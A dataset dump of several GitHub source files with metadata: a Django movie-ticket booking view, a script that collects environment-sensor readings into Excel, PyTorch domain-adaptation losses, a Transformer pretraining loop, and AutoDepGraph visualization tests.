ticket.objects.filter(id=ticketid,user=username,phone=phone).update(nos=left)\n else :\n ticket.objects.filter(id=ticketid,user=username,phone=phone).delete()\n return render(requests,'deleted.html')\n\ndef delete(requests):\n return render(requests,'delete.html')\n\ndef updatetime(requests):\n return render(requests,'updateticket.html')\n\ndef viewticket(requests):\n return render(requests,'viewticket.html')\n\ndef details(requests):\n return render(requests,'userdetails.html')\n\ndef updatetimefn(requests):\n tid=int(requests.GET['tcid'])\n timing_start=requests.GET['ts']\n timing_end=requests.GET['te']\n movie.objects.filter(id=tid).update(time_start=timing_start,time_end=timing_end)\n return render(requests,'updated.html')\n\ndef viewticketfn(requests):\n timing_start=requests.GET['ts']\n 
obj=movie.objects.get(time_start=timing_start)\n mov=obj.name\n print(mov)\n tts=ticket.objects.filter(movie=mov)\n print(tts)\n return render(requests,'viewticketdisplay.html',{'obj':tts})\n\ndef userdetailsfn(requests):\n tid=int(requests.GET['tcid'])\n print(tid)\n obj=ticket.objects.get(id=tid)\n print (obj.phone)\n return render(requests,'userdetailsdisplay.html',{'obj':obj})\n\n\n", "repo_name": "kumaranubhav1654/Django-MOVIE-Ticket-booking", "sub_path": "tickets/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2566, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "models.movie.objects.all", "line_number": 7, "usage_type": "call"}, {"api_name": "models.movie.objects", "line_number": 7, "usage_type": "attribute"}, {"api_name": "models.movie", "line_number": 7, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 8, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 17, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 17, "usage_type": "name"}, {"api_name": "models.ticket.objects.create", "line_number": 18, "usage_type": "call"}, {"api_name": "models.ticket.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "models.ticket", "line_number": 18, "usage_type": "name"}, {"api_name": "models.movie.objects.filter", "line_number": 19, "usage_type": "call"}, {"api_name": "models.movie.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "models.movie", "line_number": 19, "usage_type": "name"}, {"api_name": "models.ticket.objects.get", "line_number": 20, "usage_type": "call"}, {"api_name": "models.ticket.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "models.ticket", "line_number": 20, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "models.movie.objects.get", "line_number": 27, "usage_type": "call"}, {"api_name": "models.movie.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.movie", "line_number": 27, "usage_type": "name"}, {"api_name": "models.ticket.objects.get", "line_number": 33, "usage_type": "call"}, {"api_name": "models.ticket.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.ticket", "line_number": 33, "usage_type": "name"}, {"api_name": "models.movie.objects.filter", "line_number": 37, "usage_type": "call"}, {"api_name": "models.movie.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.movie", "line_number": 37, "usage_type": "name"}, {"api_name": "models.ticket.objects.filter", "line_number": 38, "usage_type": "call"}, {"api_name": "models.ticket.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models.ticket", "line_number": 38, "usage_type": "name"}, {"api_name": "models.ticket.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "models.ticket.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "models.ticket", "line_number": 40, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 44, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 50, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 53, 
"usage_type": "call"}, {"api_name": "models.movie.objects.filter", "line_number": 59, "usage_type": "call"}, {"api_name": "models.movie.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.movie", "line_number": 59, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 60, "usage_type": "call"}, {"api_name": "models.movie.objects.get", "line_number": 64, "usage_type": "call"}, {"api_name": "models.movie.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.movie", "line_number": 64, "usage_type": "name"}, {"api_name": "models.ticket.objects.filter", "line_number": 67, "usage_type": "call"}, {"api_name": "models.ticket.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "models.ticket", "line_number": 67, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 69, "usage_type": "call"}, {"api_name": "models.ticket.objects.get", "line_number": 74, "usage_type": "call"}, {"api_name": "models.ticket.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "models.ticket", "line_number": 74, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "31661694394", "text": "import requests\nimport json\nimport xlwt\nimport xlrd\n\n\nworkbook = xlwt.Workbook()\nrworkbook = xlrd.open_workbook('E:\\env.xls')\n\nwworkbook = workbook.add_sheet('Temperture', cell_overwrite_ok=True)\n# 表第一个单元\n# 请求指标\nurlList = [' http://172.17.13.96:16380/envDevice/getEnvIndicatorByMonitorDeviceIds', ' http://172.17.13.92:16380/envDevice/getEnvIndicatorByMonitorDeviceIds']\n\nListNotNull = True\n\n\ndef getData(urlnum):\n envurl = urlList[urlnum]\n print('请求第次', str(urlnum))\n res = requests.post(envurl, data={\"type\": \"1,2\"})\n resdatalist = res.json()['data']\n # print(resdatalist)\n return resdatalist\n\ndef getEnvName(datalist, x):\n envname = datalist[x]['name']\n # print(envname)\n return envname\n\ndef getEnvValuesList(valeslist , x ):\n envvaluesList = valeslist[x]['indicatorList']\n # listornot = type(envvaluesList)\n # print(listornot)\n return envvaluesList\n\ndef whitchtype(data):\n datawhitchtype = data\n print(datawhitchtype)\n whitchtype = type(datawhitchtype)\n print(whitchtype)\n\ndef getEnvvalues(valueslist, line):\n # whitchtype(valueslist)\n # d = [ ]\n i = line +1\n j = 1\n for x in range(len(envvalueslist)):\n envvalueslistdict = envvalueslist[x]\n envvalueslistdict.items()\n for key, value in envvalueslistdict.items():\n # wworkbook.write(i, j , key)\n writeToExcel(key,i, j)\n writeToExcel(value, i, j+1)\n # wworkbook.write(i, j+1 , value)\n # print(key)\n # print(value)\n j += 2\n j += 1\n\ndef writeToExcel(obj, row ,col):\n wworkbook.write(row, col, obj)\n\nlisrnum = 0\n# envdata = getData(lisrnum)\nenvdata = getData(lisrnum)\n\nwhile ListNotNull:\n # list是空的问题先不考虑\n flag = 0\n for i in range(len(envdata)):\n envData = envdata\n wenvname = getEnvName(envData, i)\n writeToExcel(wenvname , 0 , 0)\n envvalueslist = getEnvValuesList(envData, i)\n print(envvalueslist)\n getEnvvalues(envvalueslist, i)\n flag += 1\n if flag == int(len(envvalueslist)):\n print('envvalueslist取完了')\n lisrnum += 1\n if i == int(len(envdata) - 1):\n print('循环完了')\n ListNotNull = False\n else:\n ListNotNull = True\n\n\nworkbook.save(r'E:\\env.xls')\n\n\n\n\n# # 做参考\n# ll = list(resdatalist[0].keys())\n# ld = list(resdatalist[0].values())\n# print(ll)\n# print(ld)\n# for i in range(len(ll)):\n# print(ll[i])\n# print(ld[i])\n# temp.write(0, 
i, ll[i])\n#     temp.write(1, i, str(ld[i]))\n#\n# indicdata = resdatalist[0]['indicatorList']\n#\n# nub00 = str(rworkbook.sheet_by_name('Temperture').cell(rworkbook, 0, 0).value)\n# print(nub00)\n# # write the table header\n# def wtittle():\n#     tittlelist = list(indicdata[0].keys())\n#     print(tittlelist)\n#     for i in range(len(tittlelist)):\n#         temp.write(2, i, tittlelist[i])\n#\n# if nub00 == 'name':\n#     print(\"header is already written\")\n# else:\n#     wtittle()\n\n\n# indicdatatil = list(indicdata[0].keys())\n#\n# for i in range(len(indicdata)):\n#     devname = indicdata[i]['name']\n#     devvalue = indicdata[i]['value']\n#     devtype = indicdata[i]['type']\n#     devalarm = indicdata[i]['alarm']\n#     titlevalue = [devname, devvalue, devtype, devalarm]\n#     # onlytemp.write(0 , i , indicdatatil[i])\n#     for j in range(len(indicdatatil)):\n#         temp.write(j , {i + 1} , indicdatatil[i])\n#     print(devname)\n\n\n\n    # temp.write(1, i, int(ld['id']))\n# print(ll[0])\n\n\n\n# resdataindicatoerlist = resdatalist[0]['indicatorList']\n# zhibiao = len(resdataindicatoerlist)\n# print(zhibiao)\n\n\n#\n#\n# for x in range(len(resdataindicatoerlist)):\n#     print(str(resdataindicatoerlist[x]))\n#     data = str(resdataindicatoerlist[x])\n#     indicname = data['name']\n#     indicvla = data['value']\n#\n#     x += 1\n\n\n\n# print(nevname)\n\n\n\n\n\n", "repo_name": "Questyou/URMTest", "sub_path": "动环设备指标获取.py", "file_name": "动环设备指标获取.py", "file_ext": "py", "file_size_in_byte": 3855, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "xlwt.Workbook", "line_number": 7, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 8, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "44148902981", "text": "from typing import *\nimport torch\nimport torch.nn as nn \nfrom torch import Tensor\nimport torch.nn.functional as F \n\n\nclass ClassificationLoss(nn.Module):\n    # equivalent to tensorflow's softmax_cross_entropy_with_logits loss\n    def __init__(self):\n        super().__init__()\n\n    def forward(self, logits: Tensor, labels: Tensor) -> Tensor:\n        loss = torch.sum(- labels * F.log_softmax(logits, -1), -1)\n        return loss.mean()\n\n\nclass DomainLoss(nn.Module):\n    # discriminate input images as source / target\n    def __init__(self):\n        super().__init__()\n    \n    def forward(self, logits: Tensor, domain: Tensor, target_start_id: Optional[int] = None) -> Tuple[Tensor, Tensor]:\n        # if not given, assumes 50% source - 50% target in batch\n        target_start_id = logits.shape[0] // 2 if target_start_id is None else target_start_id\n\n        # discriminate domain of input \n        domain_loss = F.binary_cross_entropy_with_logits(logits, domain)\n\n        # adversarial loss for the target data\n        logits_target = logits[target_start_id:]\n        adv_domain_target = torch.logical_not(domain)[target_start_id:].float()\n        adv_domain_loss = F.binary_cross_entropy_with_logits(logits_target, adv_domain_target)\n\n        return domain_loss, adv_domain_loss\n\n\nclass SoftTripletKLLoss(nn.Module):\n    def __init__(self, margin: float, sigmas: List[float], l2_normalization: bool):\n        super().__init__()\n        self.margin = margin \n        self.sigmas = sigmas \n        self.l2_normalization = l2_normalization\n        self.pdist_norm = lambda x: torch.square(x).sum(1)\n\n    def forward(self, embs: Tensor, labels: Tensor) -> Tensor:\n        num_anchors = embs.shape[0]\n        labels = labels.argmax(-1)\n        if self.l2_normalization:\n            embs = F.normalize(embs, p=2, dim=1)\n\n        pdist_matrix = self.pdist_norm(embs.unsqueeze(2) - embs.T).T\n        beta = 1. / (2. 
* torch.tensor(self.sigmas, device=embs.device).unsqueeze(1))\n pdist_matrix = torch.matmul(-beta, pdist_matrix.flatten().unsqueeze(0))\n pdist_matrix = pdist_matrix.exp().sum(0).view(num_anchors, num_anchors)\n pdist_matrix /= pdist_matrix.sum(1).unsqueeze(1)\n\n mask_positives = (labels.unsqueeze(0) == labels.unsqueeze(1)).float()\n mask_negatives = torch.logical_not(mask_positives).float()\n \n anchors_rep = torch.tile(pdist_matrix, [1, num_anchors])\n anchors_rep = anchors_rep.reshape(num_anchors * num_anchors, num_anchors)\n anchors_rep_t = torch.tile(pdist_matrix, [num_anchors, 1])\n\n kl_loss = (anchors_rep * (anchors_rep.log() - anchors_rep_t.log())).sum(1)\n kl_loss = kl_loss.view(num_anchors, num_anchors)\n kl_div_pw_pos = torch.multiply(mask_positives, kl_loss)\n kl_div_pw_neg = torch.multiply(mask_negatives, kl_loss)\n kl_loss = kl_div_pw_pos.mean(1, keepdim=True) - kl_div_pw_neg.mean(1, keepdim=True) + torch.tensor(self.margin)\n kl_loss = torch.maximum(kl_loss, torch.zeros_like(kl_loss))\n\n return kl_loss.mean()\n\n\nclass ConditionalDomainLoss(nn.Module):\n def __init__(self, num_classes: int):\n super().__init__()\n self.num_classes = num_classes\n\n def forward(self, logits_list: List[Tensor], labels: Tensor, domain: Tensor, target_start_id: int) -> Tuple[Tensor, Tensor]:\n batch_size = labels.shape[0]\n sizing = [target_start_id, batch_size - target_start_id]\n labels_source, labels_target = torch.split(labels, sizing)\n domain_source, domain_target = torch.split(domain, sizing)\n logits_list_source, logits_list_target = zip(*[torch.split(l, sizing) for l in logits_list])\n\n lossA, lossB = 0., 0.\n for class_id in range(self.num_classes):\n is_class_source = (labels_source.argmax(1) == class_id).unsqueeze(1) \n masked_domain_source = torch.masked_select(domain_source, is_class_source).view(-1, 2)\n masked_class_dann_source = torch.masked_select(logits_list_source[class_id], is_class_source).view(-1, 2)\n\n is_class_target = (labels_target.argmax(1) == class_id).unsqueeze(1) \n masked_domain_target = torch.masked_select(domain_target, is_class_target).view(-1, 2)\n masked_class_dann_target = torch.masked_select(logits_list_target[class_id], is_class_target).view(-1, 2)\n masked_adv_domain_target = torch.masked_select(torch.logical_not(domain_target).float(), is_class_target).view(-1, 2)\n \n masked_domain = torch.cat((masked_domain_source, masked_domain_target), dim=0)\n masked_class_dann = torch.cat((masked_class_dann_source, masked_class_dann_target), dim=0)\n \n lossA += F.binary_cross_entropy_with_logits(masked_class_dann, masked_domain)\n lossB += F.binary_cross_entropy_with_logits(masked_class_dann_target, masked_adv_domain_target) \n \n lossA /= self.num_classes\n lossB /= self.num_classes\n \n return lossA, lossB", "repo_name": "gtziafas/dirl_pytorch", "sub_path": "digits/dirl_losses.py", "file_name": "dirl_losses.py", "file_ext": "py", "file_size_in_byte": 5014, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.nn.Module", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Module", 
"line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.functional.binary_cross_entropy_with_logits", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.logical_not", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.nn.functional.binary_cross_entropy_with_logits", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.square", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 46, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.logical_not", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.tile", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.tile", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.multiply", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.multiply", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.maximum", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 75, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.split", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.split", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.split", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.logical_not", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn.functional.binary_cross_entropy_with_logits", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.functional.binary_cross_entropy_with_logits", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 102, "usage_type": "name"}]} +{"seq_id": "34831186898", "text": "# -*- coding: utf-8 -*- \n# @Time : 2019-10-29 09:53 \n# @Author : Xiaochuan Zhang\n\n\"\"\"\nPretrain Transformer\n\"\"\"\nfrom networks import Transformer\nimport utils\nfrom loss import cal_translator_performance\nfrom tqdm import trange\nimport os\nimport json\nimport torch\nfrom 
torch.optim import Adam\nimport torch.nn as nn\nfrom torch.optim.lr_scheduler import LambdaLR\nimport random\nfrom data_manager import DataLoader, Dataset\n\n\ndef train(model, data_iterator, optimizer, scheduler, params):\n model.train()\n scheduler.step()\n\n precision_avg = utils.RunningAverage()\n loss_avg = utils.RunningAverage()\n\n t = trange(params.train_steps, desc=\"Train: \")\n for _ in t:\n # fetch the next training batch\n sources, source_pos, targets, target_pos = next(data_iterator)\n preds = model(sources, source_pos, targets, target_pos)\n\n gold = targets[:, 1:]\n loss, precision = cal_translator_performance(preds, gold)\n if params.n_gpu > 1 and params.multi_gpu:\n loss = loss.mean() # mean() to average on multi-gpu\n\n # clear previous gradients, compute gradients of all variables wrt loss\n model.zero_grad()\n loss.backward()\n\n # gradient clipping\n nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=params.clip_grad)\n\n # performs updates using calculated gradients\n optimizer.step()\n\n loss_avg.update(loss.item())\n precision_avg.update(precision)\n t.set_postfix(loss='{:05.3f}'.format(loss_avg()), precision='{:05.3f}'.format(precision_avg()))\n return loss_avg(), precision_avg()\n\n\ndef evaluate(model, data_iterator, params):\n model.eval()\n\n precision_avg = utils.RunningAverage()\n loss_avg = utils.RunningAverage()\n\n t = trange(params.val_steps, desc=\"Evaluate: \")\n for _ in t:\n # fetch the next evaluation batch\n sources, source_pos, targets, target_pos = next(data_iterator)\n preds = model(sources, source_pos, targets, target_pos)\n\n gold = targets[:, 1:]\n loss, precision = cal_translator_performance(preds, gold)\n\n if params.n_gpu > 1 and params.multi_gpu:\n loss = loss.mean()\n\n loss_avg.update(loss.item())\n precision_avg.update(precision)\n\n t.set_postfix(loss='{:05.3f}'.format(loss_avg()), precision='{:05.3f}'.format(precision_avg()))\n return loss_avg(), precision_avg()\n\n\ndef train_and_evaluate():\n\n # Preparation\n file_path = os.path.realpath(__file__)\n base_dir = os.path.dirname(file_path)\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1,2,3\"\n\n params = utils.Params(os.path.join(base_dir, \"transformer_params.json\"))\n\n params.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n params.n_gpu = torch.cuda.device_count()\n\n # Set the random seed for reproducible experiments\n random.seed(params.seed)\n torch.manual_seed(params.seed)\n if params.n_gpu > 0:\n torch.cuda.manual_seed_all(params.seed) # set random seed for all GPUs\n\n data, n_source_vocab, n_target_vocab = Dataset().load()\n data_loader = DataLoader(data, params.batch_size, require_negative_samples=False, seed=params.seed)\n transformer_model_dir = os.path.join(base_dir, './pretrained_models', 'transformer')\n print(\"max len: \", data_loader.max_len)\n transformer_config = {'n_source_vocab': n_source_vocab,\n 'n_target_vocab': n_target_vocab,\n 'max_len': data_loader.max_len,\n 'd_word_vec': 256,\n 'd_inner': 2048,\n 'n_layers': 6,\n 'n_head': 8,\n 'dropout': 0.1}\n\n transformer = Transformer(n_source_vocab=transformer_config['n_source_vocab'],\n n_target_vocab=transformer_config['n_target_vocab'],\n max_len=transformer_config['max_len'],\n d_word_vec=transformer_config['d_word_vec'],\n d_inner=transformer_config['d_inner'],\n n_layers=transformer_config['n_layers'],\n n_head=transformer_config['n_head'],\n dropout=transformer_config['dropout'])\n\n transformer.to(params.device)\n if params.n_gpu > 1 and params.multi_gpu:\n 
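# descriptive comment added: replicate the model across the visible GPUs (data-parallel)\n        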
transformer = torch.nn.DataParallel(transformer)\n\n    # Prepare optimizer\n    optimizer = Adam(filter(lambda x: x.requires_grad, transformer.parameters()), lr=params.learning_rate,\n                     betas=(0.9, 0.98), eps=1e-09)\n    scheduler = LambdaLR(optimizer, lr_lambda=lambda epoch: 1 / (1 + 0.05 * epoch))\n\n    history = {\"train_loss\": [], \"val_loss\": [], \"train_precision\": [], \"val_precision\": []}\n    \"\"\"Train the model and evaluate every epoch.\"\"\"\n    for epoch in range(1, params.epoch_num + 1):\n        print(\"Epoch: \" + str(epoch) + \"/\" + str(params.epoch_num))\n        # Compute number of batches in one epoch\n        train_size, val_size = data_loader.get_train_and_val_size()\n        params.train_steps = train_size // params.batch_size\n        params.val_steps = val_size // params.batch_size\n\n        # data iterator for training\n        train_data_iterator = data_loader.data_iterator(\"train\", shuffle=True)\n        val_data_iterator = data_loader.data_iterator(\"val\", shuffle=False)\n\n        train_loss, train_precision = train(transformer, train_data_iterator, optimizer, scheduler, params)\n        val_loss, val_precision = evaluate(transformer, val_data_iterator, params)\n        history[\"train_loss\"].append(train_loss)\n        history[\"train_precision\"].append(train_precision)\n        history[\"val_loss\"].append(val_loss)\n        history[\"val_precision\"].append(val_precision)\n\n        # Save weights of the network\n        model_to_save = transformer.module if hasattr(transformer, 'module') else transformer # Only save the model itself\n\n        utils.save_checkpoint({'epoch': epoch + 1,\n                               'state_dict': model_to_save.state_dict(),\n                               'optim_dict': optimizer.state_dict()},\n                              transformer_config,\n                              is_best=(val_loss == min(history[\"val_loss\"])),\n                              checkpoint=transformer_model_dir)\n        with open(os.path.join(transformer_model_dir, 'history.json'), 'w') as f:\n            json.dump(history, f)\n\n\nif __name__ == '__main__':\n    train_and_evaluate()\n", "repo_name": "zhangxiaochuan/MIRROR", "sub_path": "pretrain.py", "file_name": "pretrain.py", "file_ext": "py", "file_size_in_byte": 6496, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 28, "dataset": "github-code", "pt": "61", "api": [{"api_name": "utils.RunningAverage", "line_number": 26, "usage_type": "call"}, {"api_name": "utils.RunningAverage", "line_number": 27, "usage_type": "call"}, {"api_name": "tqdm.trange", "line_number": 29, "usage_type": "call"}, {"api_name": "loss.cal_translator_performance", "line_number": 36, "usage_type": "call"}, {"api_name": "loss.mean", "line_number": 38, "usage_type": "call"}, {"api_name": "loss.backward", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm_", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn.utils", "line_number": 45, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 45, "usage_type": "name"}, {"api_name": "loss.item", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.RunningAverage", "line_number": 59, "usage_type": "call"}, {"api_name": "utils.RunningAverage", "line_number": 60, "usage_type": "call"}, {"api_name": "tqdm.trange", "line_number": 62, "usage_type": "call"}, {"api_name": "loss.cal_translator_performance", "line_number": 69, "usage_type": "call"}, {"api_name": "loss.mean", "line_number": 72, "usage_type": "call"}, {"api_name": "loss.item", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 85, 
"usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 86, "usage_type": "attribute"}, {"api_name": "utils.Params", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 90, "usage_type": "attribute"}, {"api_name": "torch.cuda.device_count", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 91, "usage_type": "attribute"}, {"api_name": "random.seed", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed_all", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 97, "usage_type": "attribute"}, {"api_name": "data_manager.Dataset", "line_number": 99, "usage_type": "call"}, {"api_name": "data_manager.DataLoader", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "networks.Transformer", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.nn.DataParallel", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 123, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.LambdaLR", "line_number": 128, "usage_type": "call"}, {"api_name": "utils.save_checkpoint", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 160, "usage_type": "call"}]} +{"seq_id": "37723735760", "text": "import os\nimport qcodes as qc\nfrom autodepgraph.graph import Graph\nfrom autodepgraph import visualization as vis\nfrom unittest import TestCase\nimport autodepgraph as adg\ntest_dir = os.path.join(adg.__path__[0], 'tests', 'test_data')\n\n\nclass Test_visualization(TestCase):\n\n @classmethod\n def setUpClass(self):\n self.fn = os.path.join(test_dir, 'test_graph_states.yaml')\n self.test_graph = Graph('test_graph')\n self.test_graph.load_graph(self.fn, load_node_state=True)\n\n def test_get_node_symbols(self):\n snap = self.test_graph.snapshot()\n sm = vis.get_type_symbol_map(snap)\n\n self.assertEqual(sm['A'], vis.type_symbol_map['normal'])\n self.assertEqual(sm['C'], vis.type_symbol_map['manual_cal'])\n\n def test_get_state_col_map(self):\n snap = self.test_graph.snapshot()\n cm = vis.get_state_col_map(snap)\n\n # the check checks for certain known states in the test graph\n self.assertEqual(cm['A'], vis.state_cmap['good'])\n self.assertEqual(cm['B'], vis.state_cmap['needs calibration'])\n self.assertEqual(cm['C'], vis.state_cmap['active'])\n self.assertEqual(cm['D'], vis.state_cmap['bad'])\n self.assertEqual(cm['E'], vis.state_cmap['unknown'])\n\n def test_snapshot_to_nxGraph(self):\n # ensures that the graph is returned to the state from before this\n # test.\n snap = self.test_graph.snapshot()\n nxG = vis.snapshot_to_nxGraph(snap)\n self.assertEqual(set(nxG.nodes()),\n set(['A', 'B', 'C', 'D', 'E', 'F', 'G', 
'H']))\n dep_edges = set([('D', 'C'), ('D', 'A'), ('E', 'D'), ('G', 'F'),\n ('C', 'B'), ('B', 'A'), ('G', 'D'), ('H', 'G')])\n self.assertEqual(set(nxG.edges()), dep_edges)\n\n def test_draw_graph_mpl(self):\n # This test only tests if the plotting runs and does not check if\n # it is correct\n snap = self.test_graph.snapshot()\n vis.draw_graph_mpl(snap)\n\n self.test_graph.plot_mode = 'mpl'\n self.test_graph.update_monitor()\n\n def test_graph_changed_correct_plotting(self):\n # This test only tests if the plotting runs and does not check if\n # it is correct\n self.test_graph_2 = Graph('test_graph_2')\n self.test_graph_2.load_graph(self.fn, load_node_state=True)\n snap = self.test_graph_2.snapshot()\n DiGraphWindow = vis.draw_graph_pyqt(snap)\n # Updating and reusing the same plot\n DiGraphWindow = vis.draw_graph_pyqt(snap, DiGraphWindow=DiGraphWindow)\n\n self.test_graph_2.plot_mode = 'pg'\n self.test_graph_2.update_monitor()\n self.assertEqual(self.test_graph_2._graph_changed_since_plot, False)\n nodeJ = self.test_graph_2.add_node('J')\n nodeJ.parents(['G'])\n self.assertEqual(self.test_graph_2._graph_changed_since_plot, True)\n self.test_graph_2.update_monitor()\n nodeJ.remove_parent('G')\n\n def test_draw_graph_pyqt(self):\n # This test only tests if the plotting runs and does not check if\n # it is correct\n self.test_graph.plot_mode = 'pg'\n self.test_graph.update_monitor()\n\n @classmethod\n def tearDownClass(self):\n # finds and closes all qcodes instruments\n all_instrs = (list(qc.Instrument._all_instruments.keys()))\n for insname in all_instrs:\n try:\n qc.Instrument.find_instrument(insname).close()\n except KeyError:\n pass\n", "repo_name": "brianzi/AutoDepGraph", "sub_path": "autodepgraph/tests/test_visualization.py", "file_name": "test_visualization.py", "file_ext": "py", "file_size_in_byte": 3503, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "autodepgraph.__path__", "line_number": 7, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 14, 